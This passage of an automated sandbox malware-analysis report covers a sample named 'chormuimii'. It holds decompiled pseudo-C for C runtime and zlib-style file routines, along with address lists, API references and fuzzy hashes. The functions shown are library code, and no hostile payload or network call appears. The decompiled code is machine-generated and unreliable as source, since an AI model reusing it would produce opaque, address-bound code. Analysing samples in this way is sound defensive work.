						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2, Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Strings

'B, xrefs: 0040C70F

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID: 'B
API String ID: 2805327698-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00414738, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x22815f8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x22815f8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x22815f8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(022815F8), ref: 00414050

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
